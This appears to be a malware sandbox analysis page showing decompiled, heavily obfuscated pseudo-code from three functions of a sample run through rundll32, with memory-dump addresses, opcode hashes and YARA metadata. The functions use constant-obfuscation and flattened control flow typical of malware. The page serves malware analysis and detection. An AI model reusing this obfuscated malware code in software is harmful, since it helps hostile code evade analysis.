                                                                                                                      0x002c442c
                                                                                                                      0x002c4434
                                                                                                                      0x002c443c
                                                                                                                      0x002c4444
                                                                                                                      0x002c4451
                                                                                                                      0x002c4455
                                                                                                                      0x002c445d
                                                                                                                      0x002c4465
                                                                                                                      0x002c446d
                                                                                                                      0x002c447a
                                                                                                                      0x002c4483
                                                                                                                      0x002c4487
                                                                                                                      0x002c448f
                                                                                                                      0x002c448f
                                                                                                                      0x002c448f
                                                                                                                      0x002c4494
                                                                                                                      0x002c4494
                                                                                                                      0x002c44a2
                                                                                                                      0x002c4558
                                                                                                                      0x00000000
                                                                                                                      0x002c44a8
                                                                                                                      0x002c44ae
                                                                                                                      0x002c45b9
                                                                                                                      0x002c44b4
                                                                                                                      0x002c44b6
                                                                                                                      0x002c44e1
                                                                                                                      0x002c44e5
                                                                                                                      0x002c44ed
                                                                                                                      0x002c44f1
                                                                                                                      0x002c452f
                                                                                                                      0x002c454b
                                                                                                                      0x002c454e
                                                                                                                      0x002c4553
                                                                                                                      0x002c458f
                                                                                                                      0x002c4591
                                                                                                                      0x002c4596
                                                                                                                      0x00000000
                                                                                                                      0x002c44b8
                                                                                                                      0x002c44be
                                                                                                                      0x00000000
                                                                                                                      0x002c44c4
                                                                                                                      0x002c44c4
                                                                                                                      0x002c44ca
                                                                                                                      0x002c44d5
                                                                                                                      0x002c44d2
                                                                                                                      0x002c44d2
                                                                                                                      0x002c44d2
                                                                                                                      0x002c44da
                                                                                                                      0x002c44dd
                                                                                                                      0x00000000
                                                                                                                      0x002c44dd
                                                                                                                      0x002c44be
                                                                                                                      0x002c44b6
                                                                                                                      0x002c44ae
                                                                                                                      0x002c45c1
                                                                                                                      0x002c45cc
                                                                                                                      0x002c45cc
                                                                                                                      0x002c4577
                                                                                                                      0x002c457e
                                                                                                                      0x002c4581
                                                                                                                      0x002c4583
                                                                                                                      0x002c4588
                                                                                                                      0x002c4588
                                                                                                                      0x002c458b
                                                                                                                      0x00000000
                                                                                                                      0x002c4597
                                                                                                                      0x002c4597
                                                                                                                      0x002c4597
                                                                                                                      0x00000000
                                                                                                                      0x002c45a3

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m3$mZ;
                                                                                                                      • API String ID: 0-2099856273
                                                                                                                      • Opcode ID: 99b550a256a5b65e6c9fb908ec07323d3f2f98f22e4f6a124c5eeba4f461e6c2
                                                                                                                      • Instruction ID: 1c8a7ea7a55674623a0262d305236250653e5aa47d89793e0accefef4e1042ce
                                                                                                                      • Opcode Fuzzy Hash: 99b550a256a5b65e6c9fb908ec07323d3f2f98f22e4f6a124c5eeba4f461e6c2
                                                                                                                      • Instruction Fuzzy Hash: 59A111B25093409BC368CF25D98A91BFBF1BBD8798F104A1DF29596260D3B1CA19CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CFF31 Relevance: 2.7, Strings: 2, Instructions: 176COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002CFF31(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				void* _t147;
				intOrPtr _t161;
				signed int _t169;
				void* _t172;
				void* _t188;
				intOrPtr* _t189;
				void* _t191;
				void* _t192;

				_push(_a12);
				_t188 = __edx;
				_t189 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t147);
				_v60 = 0xe50c8f;
				_v56 = 0;
				_t192 = _t191 + 0x14;
				_v52 = 0;
				_v76 = 0x2f3c66;
				_t172 = 0x80c5f05;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00179e33;
				_v100 = 0xdfcc0f;
				_v100 = _v100 + 0x5dbe;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x00087c2f;
				_v112 = 0xadc62;
				_v112 = _v112 | 0x1372df76;
				_v112 = _v112 >> 7;
				_v112 = _v112 ^ 0x002d2981;
				_v116 = 0xfe909d;
				_v116 = _v116 << 7;
				_t169 = 0x44;
				_v116 = _v116 / _t169;
				_v116 = _v116 >> 0xc;
				_v116 = _v116 ^ 0x0009e39a;
				_v120 = 0xded18e;
				_v120 = _v120 + 0xffff5063;
				_v120 = _v120 ^ 0xd3175283;
				_v120 = _v120 * 0x6d;
				_v120 = _v120 ^ 0x2cc94156;
				_v124 = 0xc7fb01;
				_v124 = _v124 + 0xffff9b92;
				_v124 = _v124 | 0x8f919799;
				_v124 = _v124 + 0xaff8;
				_v124 = _v124 ^ 0x8fd45f25;
				_v68 = 0xadf2f0;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x056cc5e6;
				_v72 = 0x9db552;
				_v72 = _v72 << 6;
				_v72 = _v72 ^ 0x276b9b1e;
				_v64 = 0x9edb03;
				_v64 = _v64 ^ 0x7ad40136;
				_v64 = _v64 ^ 0x7a416b45;
				_v96 = 0x899086;
				_v96 = _v96 + 0x3abe;
				_v96 = _v96 + 0xffff9b83;
				_v96 = _v96 ^ 0x008dc818;
				_v80 = 0x1613a8;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000fe8a1;
				_v84 = 0xc2e1e1;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0c264902;
				_v104 = 0x78369d;
				_v104 = _v104 ^ 0x8f03ebf2;
				_v104 = _v104 * 0x5b;
				_v104 = _v104 ^ 0x010dd9c3;
				_v88 = 0x6e061c;
				_v88 = _v88 * 0x7f;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x00d4f969;
				_v92 = 0x56c027;
				_v92 = _v92 ^ 0x48eed99d;
				_v92 = _v92 + 0xffff6999;
				_v92 = _v92 ^ 0x48bab2c5;
				_v108 = 0xffa91b;
				_v108 = _v108 * 0x23;
				_v108 = _v108 | 0x4c85b786;
				_v108 = _v108 * 0x3a;
				_v108 = _v108 ^ 0x23a92266;
				do {
					while(_t172 != 0xd9dda6) {
						if(_t172 == 0x1ff9304) {
							E002C4D91( *((intOrPtr*)(_t188 + 0x14)),  &_v48, _v64, _v96);
							_t192 = _t192 + 8;
							_t172 = 0xcf0dfe0;
							continue;
						} else {
							if(_t172 == 0x2f8759c) {
								_push(_t172);
								_push(_t172);
								_t161 = E002C3512( *(_t189 + 4));
								 *_t189 = _t161;
								__eflags = _t161;
								if(__eflags != 0) {
									_t172 = 0x3d5ab39;
									continue;
								}
							} else {
								if(_t172 == 0x3d5ab39) {
									E002C64C5(_v120, _v124, _v68, _v72, _t189,  &_v48);
									_t192 = _t192 + 0x10;
									_t172 = 0x1ff9304;
									continue;
								} else {
									if(_t172 == 0x80c5f05) {
										_t172 = 0xd9dda6;
										 *_t189 = 0;
										 *(_t189 + 4) = _v76;
										continue;
									} else {
										if(_t172 == 0xcf0dfe0) {
											E002CF88F(_t188 + 0xc,  &_v48, __eflags, _v80, _v84, _v104);
											_t192 = _t192 + 0xc;
											_t172 = 0xfec6e86;
											continue;
										} else {
											_t201 = _t172 - 0xfec6e86;
											if(_t172 != 0xfec6e86) {
												goto L17;
											} else {
												E002CF88F(_t188 + 4,  &_v48, _t201, _v88, _v92, _v108);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t189 != 0x00000000;
					}
					 *(_t189 + 4) = E002C542E(_t188);
					_t172 = 0x2f8759c;
					L17:
					__eflags = _t172 - 0x1551776;
				} while (__eflags != 0);
				goto L9;
			}































                                                                                                                      0x002cff3b
                                                                                                                      0x002cff42
                                                                                                                      0x002cff44
                                                                                                                      0x002cff46
                                                                                                                      0x002cff4d
                                                                                                                      0x002cff54
                                                                                                                      0x002cff55
                                                                                                                      0x002cff56
                                                                                                                      0x002cff5b
                                                                                                                      0x002cff65
                                                                                                                      0x002cff69
                                                                                                                      0x002cff6c
                                                                                                                      0x002cff72
                                                                                                                      0x002cff7a
                                                                                                                      0x002cff7f
                                                                                                                      0x002cff83
                                                                                                                      0x002cff8b
                                                                                                                      0x002cff93
                                                                                                                      0x002cff9b
                                                                                                                      0x002cffa0
                                                                                                                      0x002cffa8
                                                                                                                      0x002cffb0
                                                                                                                      0x002cffb8
                                                                                                                      0x002cffbd
                                                                                                                      0x002cffc5
                                                                                                                      0x002cffcd
                                                                                                                      0x002cffd8
                                                                                                                      0x002cffdb
                                                                                                                      0x002cffdf
                                                                                                                      0x002cffe4
                                                                                                                      0x002cffec
                                                                                                                      0x002cfff4
                                                                                                                      0x002cfffc
                                                                                                                      0x002d0009
                                                                                                                      0x002d000d
                                                                                                                      0x002d0015
                                                                                                                      0x002d001d
                                                                                                                      0x002d0025
                                                                                                                      0x002d002d
                                                                                                                      0x002d0035
                                                                                                                      0x002d003d
                                                                                                                      0x002d0045
                                                                                                                      0x002d004a
                                                                                                                      0x002d0052
                                                                                                                      0x002d005a
                                                                                                                      0x002d005f
                                                                                                                      0x002d0067
                                                                                                                      0x002d006f
                                                                                                                      0x002d0077
                                                                                                                      0x002d007f
                                                                                                                      0x002d0087
                                                                                                                      0x002d008f
                                                                                                                      0x002d0097
                                                                                                                      0x002d009f
                                                                                                                      0x002d00a7
                                                                                                                      0x002d00ac
                                                                                                                      0x002d00b4
                                                                                                                      0x002d00bc
                                                                                                                      0x002d00c1
                                                                                                                      0x002d00c9
                                                                                                                      0x002d00d1
                                                                                                                      0x002d00de
                                                                                                                      0x002d00e2
                                                                                                                      0x002d00ea
                                                                                                                      0x002d00f7
                                                                                                                      0x002d00fb
                                                                                                                      0x002d0100
                                                                                                                      0x002d0108
                                                                                                                      0x002d0110
                                                                                                                      0x002d0118
                                                                                                                      0x002d0125
                                                                                                                      0x002d012d
                                                                                                                      0x002d013a
                                                                                                                      0x002d013e
                                                                                                                      0x002d014b
                                                                                                                      0x002d014f
                                                                                                                      0x002d0157
                                                                                                                      0x002d0157
                                                                                                                      0x002d0169
                                                                                                                      0x002d0264
                                                                                                                      0x002d0269
                                                                                                                      0x002d026c
                                                                                                                      0x00000000
                                                                                                                      0x002d016f
                                                                                                                      0x002d0175
                                                                                                                      0x002d0238
                                                                                                                      0x002d0239
                                                                                                                      0x002d023d
                                                                                                                      0x002d0242
                                                                                                                      0x002d0246
                                                                                                                      0x002d0248
                                                                                                                      0x002d024e
                                                                                                                      0x00000000
                                                                                                                      0x002d024e
                                                                                                                      0x002d017b
                                                                                                                      0x002d017d
                                                                                                                      0x002d021a
                                                                                                                      0x002d021f
                                                                                                                      0x002d0222
                                                                                                                      0x00000000
                                                                                                                      0x002d0183
                                                                                                                      0x002d0189
                                                                                                                      0x002d01f5
                                                                                                                      0x002d01fa
                                                                                                                      0x002d01fc
                                                                                                                      0x00000000
                                                                                                                      0x002d018b
                                                                                                                      0x002d0191
                                                                                                                      0x002d01df
                                                                                                                      0x002d01e4
                                                                                                                      0x002d01e7
                                                                                                                      0x00000000
                                                                                                                      0x002d0193
                                                                                                                      0x002d0193
                                                                                                                      0x002d0199
                                                                                                                      0x00000000
                                                                                                                      0x002d019f
                                                                                                                      0x002d01b2
                                                                                                                      0x002d01b7
                                                                                                                      0x002d0199
                                                                                                                      0x002d0191
                                                                                                                      0x002d0189
                                                                                                                      0x002d017d
                                                                                                                      0x002d0175
                                                                                                                      0x002d01bb
                                                                                                                      0x002d01cb
                                                                                                                      0x002d01cb
                                                                                                                      0x002d027d
                                                                                                                      0x002d0280
                                                                                                                      0x002d0285
                                                                                                                      0x002d0285
                                                                                                                      0x002d0285
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EkAz$f</
                                                                                                                      • API String ID: 0-1101062405
                                                                                                                      • Opcode ID: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction ID: 913432869c9d6da5ac872e1800d8334707c02ec0e1a5de820b3e32110549e6f3
                                                                                                                      • Opcode Fuzzy Hash: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction Fuzzy Hash: 3A8111710183419FC368CF25C98A92BFBF1FBC4748F504A1EF69A46260D7B19A59CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CC9A9 Relevance: 2.7, Strings: 2, Instructions: 163COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002CC9A9(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t147;
				void* _t168;
				void* _t171;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int* _t195;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002BCF25(_t147);
				_v60 = 0x2183dd;
				_t195 =  &(( &_v64)[6]);
				_v60 = _v60 << 0xc;
				_v60 = _v60 << 0xf;
				_t192 = 0;
				_t171 = 0xa488efe;
				_t188 = 0x78;
				_v60 = _v60 * 0xa;
				_v60 = _v60 ^ 0x10000001;
				_v44 = 0xe22f1a;
				_v44 = _v44 + 0xffffab53;
				_v44 = _v44 / _t188;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x00003c3b;
				_v36 = 0x9a4ce6;
				_v36 = _v36 + 0xffffe16e;
				_v36 = _v36 | 0x72a3b0b5;
				_v36 = _v36 ^ 0x32bbbef5;
				_v28 = 0xd892e4;
				_v28 = _v28 | 0x189bde37;
				_v28 = _v28 ^ 0x998d043c;
				_v28 = _v28 ^ 0xc156dacb;
				_v20 = 0xff0234;
				_v20 = _v20 + 0xffffad5b;
				_v20 = _v20 ^ 0x00f1fad0;
				_v40 = 0xdc05b;
				_v40 = _v40 ^ 0xb55e20f9;
				_t189 = 3;
				_v40 = _v40 / _t189;
				_v40 = _v40 ^ 0x3c7a3b1c;
				_v64 = 0x518ad0;
				_v64 = _v64 ^ 0x6bfb13ad;
				_v64 = _v64 << 2;
				_t190 = 0x6a;
				_v64 = _v64 * 7;
				_v64 = _v64 ^ 0xc6a3f60b;
				_v24 = 0x25f852;
				_v24 = _v24 + 0xffff91c6;
				_v24 = _v24 ^ 0x002d038f;
				_v32 = 0x681d6c;
				_v32 = _v32 ^ 0x9f49642f;
				_v32 = _v32 * 0x3a;
				_v32 = _v32 ^ 0x0d93f477;
				_v56 = 0xa4373;
				_v56 = _v56 >> 9;
				_v56 = _v56 << 0xb;
				_v56 = _v56 << 9;
				_v56 = _v56 ^ 0x521bad52;
				_v16 = 0x3abafe;
				_v16 = _v16 | 0x2531d7a0;
				_v16 = _v16 ^ 0x25301684;
				_v48 = 0x8b99e8;
				_v48 = _v48 ^ 0x8a9a3b2d;
				_v48 = _v48 * 0x56;
				_v48 = _v48 / _t190;
				_v48 = _v48 ^ 0x00e0af40;
				_v8 = 0xf2305e;
				_v8 = _v8 | 0x3a3bb36f;
				_v8 = _v8 ^ 0x3af325a3;
				_v52 = 0xa4558c;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0xad08;
				_v52 = _v52 ^ 0x0057bd84;
				_v12 = 0xb8a572;
				_v12 = _v12 | 0x00b7603c;
				_v12 = _v12 ^ 0x00ba29b3;
				while(_t171 != 0x263a30c) {
					if(_t171 == 0x50e379a) {
						_push(_t171);
						_push(_t171);
						_t192 = E002C3512(_v4 + _v4);
						if(_t192 != 0) {
							_t171 = 0x263a30c;
							continue;
						}
					} else {
						if(_t171 == 0xa488efe) {
							_t171 = 0xdc1694f;
							continue;
						} else {
							if(_t171 != 0xdc1694f) {
								L11:
								if(_t171 != 0xa17b831) {
									continue;
								}
							} else {
								_t168 = E002CD2A8(0, _v36 | _v60, _v20, _a16, _v40, _v64, _a8, _v24,  &_v4);
								_t195 =  &(_t195[7]);
								if(_t168 != 0) {
									_t171 = 0x50e379a;
									continue;
								}
							}
						}
					}
					return _t192;
				}
				E002CD2A8(_t192, _v28 | _v44, _v48, _a16, _v8, _v52, _a8, _v12,  &_v4);
				_t195 =  &(_t195[7]);
				_t171 = 0xa17b831;
				goto L11;
			}




























                                                                                                                      0x002cc9b0
                                                                                                                      0x002cc9b4
                                                                                                                      0x002cc9b8
                                                                                                                      0x002cc9bc
                                                                                                                      0x002cc9c0
                                                                                                                      0x002cc9c2
                                                                                                                      0x002cc9c7
                                                                                                                      0x002cc9cf
                                                                                                                      0x002cc9d2
                                                                                                                      0x002cc9d9
                                                                                                                      0x002cc9de
                                                                                                                      0x002cc9e5
                                                                                                                      0x002cc9ec
                                                                                                                      0x002cc9ef
                                                                                                                      0x002cc9f3
                                                                                                                      0x002cc9fb
                                                                                                                      0x002cca03
                                                                                                                      0x002cca13
                                                                                                                      0x002cca17
                                                                                                                      0x002cca1c
                                                                                                                      0x002cca24
                                                                                                                      0x002cca2c
                                                                                                                      0x002cca34
                                                                                                                      0x002cca3c
                                                                                                                      0x002cca44
                                                                                                                      0x002cca4c
                                                                                                                      0x002cca54
                                                                                                                      0x002cca5c
                                                                                                                      0x002cca64
                                                                                                                      0x002cca6c
                                                                                                                      0x002cca74
                                                                                                                      0x002cca7c
                                                                                                                      0x002cca84
                                                                                                                      0x002cca90
                                                                                                                      0x002cca95
                                                                                                                      0x002cca9b
                                                                                                                      0x002ccaa3
                                                                                                                      0x002ccaab
                                                                                                                      0x002ccab3
                                                                                                                      0x002ccabd
                                                                                                                      0x002ccabe
                                                                                                                      0x002ccac2
                                                                                                                      0x002ccaca
                                                                                                                      0x002ccad2
                                                                                                                      0x002ccada
                                                                                                                      0x002ccae2
                                                                                                                      0x002ccaea
                                                                                                                      0x002ccaf7
                                                                                                                      0x002ccafb
                                                                                                                      0x002ccb03
                                                                                                                      0x002ccb0b
                                                                                                                      0x002ccb10
                                                                                                                      0x002ccb15
                                                                                                                      0x002ccb1a
                                                                                                                      0x002ccb22
                                                                                                                      0x002ccb2a
                                                                                                                      0x002ccb32
                                                                                                                      0x002ccb3a
                                                                                                                      0x002ccb42
                                                                                                                      0x002ccb4f
                                                                                                                      0x002ccb59
                                                                                                                      0x002ccb62
                                                                                                                      0x002ccb6f
                                                                                                                      0x002ccb7c
                                                                                                                      0x002ccb84
                                                                                                                      0x002ccb8c
                                                                                                                      0x002ccb94
                                                                                                                      0x002ccb99
                                                                                                                      0x002ccb9e
                                                                                                                      0x002ccba6
                                                                                                                      0x002ccbae
                                                                                                                      0x002ccbb6
                                                                                                                      0x002ccbbe
                                                                                                                      0x002ccbc6
                                                                                                                      0x002ccbcc
                                                                                                                      0x002ccc29
                                                                                                                      0x002ccc2a
                                                                                                                      0x002ccc33
                                                                                                                      0x002ccc39
                                                                                                                      0x002ccc3b
                                                                                                                      0x00000000
                                                                                                                      0x002ccc3b
                                                                                                                      0x002ccbce
                                                                                                                      0x002ccbd4
                                                                                                                      0x002ccc15
                                                                                                                      0x00000000
                                                                                                                      0x002ccbd6
                                                                                                                      0x002ccbd8
                                                                                                                      0x002ccc73
                                                                                                                      0x002ccc79
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ccbde
                                                                                                                      0x002ccc05
                                                                                                                      0x002ccc0a
                                                                                                                      0x002ccc0f
                                                                                                                      0x002ccc11
                                                                                                                      0x00000000
                                                                                                                      0x002ccc11
                                                                                                                      0x002ccc0f
                                                                                                                      0x002ccbd8
                                                                                                                      0x002ccbd4
                                                                                                                      0x002ccc88
                                                                                                                      0x002ccc88
                                                                                                                      0x002ccc66
                                                                                                                      0x002ccc6b
                                                                                                                      0x002ccc6e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<$sC
                                                                                                                      • API String ID: 0-4190640370
                                                                                                                      • Opcode ID: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction ID: 856cde13cbcede3a75235c4a9b21b9bcaca2855a292c4752f8b719073b023442
                                                                                                                      • Opcode Fuzzy Hash: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction Fuzzy Hash: F87122721183819FC354CF25C88A91FBBF2FBD4798F544A1DF59A86220C372DA59CB86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B777B Relevance: 2.7, Strings: 2, Instructions: 162COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002B777B(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t128;
				signed int _t149;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t179;
				void* _t181;
				void* _t182;

				_push(_a16);
				_t178 = _a4;
				_t179 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t128);
				_v104 = 0x8623b;
				_t182 = _t181 + 0x18;
				_v104 = _v104 + 0xffff31eb;
				_v104 = _v104 | 0x66daf122;
				_t158 = 0xd040992;
				_t152 = 0x22;
				_v104 = _v104 / _t152;
				_v104 = _v104 ^ 0x03069644;
				_v100 = 0x2bbbe;
				_t153 = 0x14;
				_v100 = _v100 * 0xf;
				_v100 = _v100 / _t153;
				_v100 = _v100 | 0x351d3417;
				_v100 = _v100 ^ 0x351dc123;
				_v72 = 0xab81ef;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 ^ 0x000a49b6;
				_v76 = 0x16a933;
				_v76 = _v76 ^ 0xe7c1b086;
				_v76 = _v76 ^ 0xe7d23b20;
				_v60 = 0x52cbe;
				_t154 = 0x2d;
				_v60 = _v60 * 0x6f;
				_v60 = _v60 ^ 0x023eaa51;
				_v84 = 0x759948;
				_v84 = _v84 + 0x9b78;
				_v84 = _v84 ^ 0xc5583688;
				_v84 = _v84 ^ 0xc523a4cd;
				_v88 = 0xf8b174;
				_v88 = _v88 << 0xa;
				_v88 = _v88 | 0xb04365c9;
				_v88 = _v88 ^ 0xf2c73fc1;
				_v64 = 0x1cff55;
				_v64 = _v64 / _t154;
				_v64 = _v64 ^ 0x000b3edd;
				_v68 = 0x9a9e72;
				_v68 = _v68 + 0xffffcb3f;
				_v68 = _v68 ^ 0x009b4266;
				_v92 = 0x7b2ebb;
				_v92 = _v92 << 0xb;
				_v92 = _v92 ^ 0xf233ff82;
				_v92 = _v92 ^ 0x2b4dc82a;
				_v96 = 0x6d21c4;
				_v96 = _v96 ^ 0x8acf53c4;
				_v96 = _v96 + 0xffff3a52;
				_v96 = _v96 | 0xe5741bb4;
				_v96 = _v96 ^ 0xeff12f72;
				_v56 = 0x5c5116;
				_v56 = _v56 + 0xffff598a;
				_v56 = _v56 ^ 0x00573a27;
				_v80 = 0xae67f2;
				_v80 = _v80 + 0x56e4;
				_t155 = 0x50;
				_v80 = _v80 / _t155;
				_v80 = _v80 ^ 0x0002e359;
				do {
					while(_t158 != 0x253e674) {
						if(_t158 == 0x4f8855c) {
							E002CF88F(_t178 + 4,  &_v52, __eflags, _v96, _v56, _v80);
						} else {
							if(_t158 == 0x5caea7a) {
								E002C4D91( *_t178,  &_v52, _v68, _v92);
								_t182 = _t182 + 8;
								_t158 = 0x4f8855c;
								continue;
							} else {
								if(_t158 == 0x9ad54af) {
									_push(_t158);
									_push(_t158);
									_t149 = E002C3512(_t179[1]);
									 *_t179 = _t149;
									__eflags = _t149;
									if(__eflags != 0) {
										_t158 = 0x253e674;
										continue;
									}
								} else {
									if(_t158 == 0xa436207) {
										_t179[1] = E002C109E(_t178);
										_t158 = 0x9ad54af;
										continue;
									} else {
										if(_t158 != 0xd040992) {
											goto L13;
										} else {
											_t158 = 0xa436207;
											 *_t179 =  *_t179 & 0x00000000;
											_t179[1] = _v104;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t179;
						_t127 =  *_t179 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					E002C64C5(_v60, _v84, _v88, _v64, _t179,  &_v52);
					_t182 = _t182 + 0x10;
					_t158 = 0x5caea7a;
					L13:
					__eflags = _t158 - 0x12a0183;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                      0x002b7782
                                                                                                                      0x002b7789
                                                                                                                      0x002b7790
                                                                                                                      0x002b7792
                                                                                                                      0x002b7799
                                                                                                                      0x002b77a0
                                                                                                                      0x002b77a1
                                                                                                                      0x002b77a2
                                                                                                                      0x002b77a3
                                                                                                                      0x002b77a8
                                                                                                                      0x002b77b0
                                                                                                                      0x002b77b3
                                                                                                                      0x002b77bd
                                                                                                                      0x002b77c5
                                                                                                                      0x002b77d0
                                                                                                                      0x002b77d5
                                                                                                                      0x002b77db
                                                                                                                      0x002b77e3
                                                                                                                      0x002b77f0
                                                                                                                      0x002b77f3
                                                                                                                      0x002b77ff
                                                                                                                      0x002b7803
                                                                                                                      0x002b780b
                                                                                                                      0x002b7813
                                                                                                                      0x002b781b
                                                                                                                      0x002b7820
                                                                                                                      0x002b7828
                                                                                                                      0x002b7830
                                                                                                                      0x002b7838
                                                                                                                      0x002b7840
                                                                                                                      0x002b784d
                                                                                                                      0x002b784e
                                                                                                                      0x002b7852
                                                                                                                      0x002b785a
                                                                                                                      0x002b7862
                                                                                                                      0x002b786a
                                                                                                                      0x002b7872
                                                                                                                      0x002b787a
                                                                                                                      0x002b7882
                                                                                                                      0x002b7887
                                                                                                                      0x002b788f
                                                                                                                      0x002b7897
                                                                                                                      0x002b78a5
                                                                                                                      0x002b78a9
                                                                                                                      0x002b78b1
                                                                                                                      0x002b78b9
                                                                                                                      0x002b78c1
                                                                                                                      0x002b78c9
                                                                                                                      0x002b78d1
                                                                                                                      0x002b78d6
                                                                                                                      0x002b78de
                                                                                                                      0x002b78e6
                                                                                                                      0x002b78ee
                                                                                                                      0x002b78f6
                                                                                                                      0x002b78fe
                                                                                                                      0x002b7906
                                                                                                                      0x002b790e
                                                                                                                      0x002b7916
                                                                                                                      0x002b791e
                                                                                                                      0x002b7926
                                                                                                                      0x002b792e
                                                                                                                      0x002b793e
                                                                                                                      0x002b794b
                                                                                                                      0x002b794f
                                                                                                                      0x002b7957
                                                                                                                      0x002b7957
                                                                                                                      0x002b7965
                                                                                                                      0x002b7a30
                                                                                                                      0x002b796b
                                                                                                                      0x002b7971
                                                                                                                      0x002b79da
                                                                                                                      0x002b79df
                                                                                                                      0x002b79e2
                                                                                                                      0x00000000
                                                                                                                      0x002b7973
                                                                                                                      0x002b7979
                                                                                                                      0x002b79b6
                                                                                                                      0x002b79b7
                                                                                                                      0x002b79bb
                                                                                                                      0x002b79c0
                                                                                                                      0x002b79c4
                                                                                                                      0x002b79c6
                                                                                                                      0x002b79c8
                                                                                                                      0x00000000
                                                                                                                      0x002b79c8
                                                                                                                      0x002b797b
                                                                                                                      0x002b797d
                                                                                                                      0x002b79a0
                                                                                                                      0x002b79a3
                                                                                                                      0x00000000
                                                                                                                      0x002b797f
